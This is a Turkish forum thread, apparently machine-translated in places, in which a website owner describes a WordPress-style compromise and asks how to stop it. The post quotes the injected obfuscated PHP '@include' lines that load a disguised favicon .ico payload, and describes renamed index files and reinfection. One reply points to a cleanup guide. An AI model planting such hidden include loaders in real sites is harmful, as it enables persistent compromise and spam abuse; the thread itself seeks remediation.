Duyuru

Collapse
No announcement yet.

Acil Yardım Site Saldırıya Uğradı

Collapse
X
  • Filtrele
  • Zaman
  • Göster
Hepsini Sil
new posts

  • Acil Yardım Site Saldırıya Uğradı

    Birkaç gün önce, sitelerimden birkaçının enfekte olduğunu fark ettim. Her bir dosyayı tek tek aramak için uğraştım, sonunda tüm index.php'yi buldum ve bazı wp-config.php dosyaları 755 izinleri var.

    Bu dosyaları açtım ve <?

    Php'den sonra bir kod ekledim ve eklenen kod şöyle görünüyor: / * 76a6b * /

    @ include "\ x2fho \ x6de / \ x7aem \ x72ao \ x72g / \ x70ub \ x6cic \ x5fht \ x6dl /\x6bna\x71u.\x6frg\x2fup\x64at\x65 f \ x6fr \ x37.0 \ x2fst \ x65p \ x32 / f \ x61vi \ x63on \ x5f14 \ x64ed \ x36.i \ x63o ";

    / * 76a6b * /

    Bu satırın kodunu çözdükten sonra, bir. .ico dosyası sunucumda şu şekilde yüklendi: favicon_445351.ico

    Tüm index.html dosyaları index.html.bak.bak ve index.php olarak yeniden adlandırıldı bu kodla:

    <? php
    / * 85130 * /

    @içerir "\ x2fh \ x6fm \ X65 / \ x7ae \ x6dr \ x61o \ x72g \ x2fp \ x75b \ x6ci \ x63_ \ x68t \ x6dl \ x2fk \ x6ea \ x71u \ x2eo \ x72g \ x2fu \ x70d \ x61t \ X65 \ x66o \ x72 \ x37 \ x30 \ \ x2ff \ x61v \ x69c \ x6fn \ x5f1 \ x34d \ x65d \ x36. \ x69c \ x6f ";

    / * 85130 * /

    echo file_get_contents ('index.html.bak.bak');

    Bütün @ kaldırmak için elle çalıştı dahil 644 * .php dosya izinlerini değiştirmek benim sunucuya eklenen COEs ama ertesi gün onlar * Farklı dizinde .ico dosyası ve @ eklemekdahil kodları tekrar eklenir.

    Spam e-postaları gönderen kodu etkinleştirmek için her ziyaretimi sitem / lerime kullanıyorlar.

    Bunu herkes deneyimledi mi ve eğer birileri biliyorsa, bunun nasıl önlenebileceğini bana bildirir misiniz?

  • #2
    https://www.eladesign.org/wordpress-virusu-temizleme/ bu sayfada yazanları uygularsan sorunun çözülecektir. Eğer hala çözemediysen bana ulaşabilirsin.

    Yorum Ekle


    • #3
      Teşekkürler Kardeşim

      Yorum Ekle

      Hazırlanıyor...
      X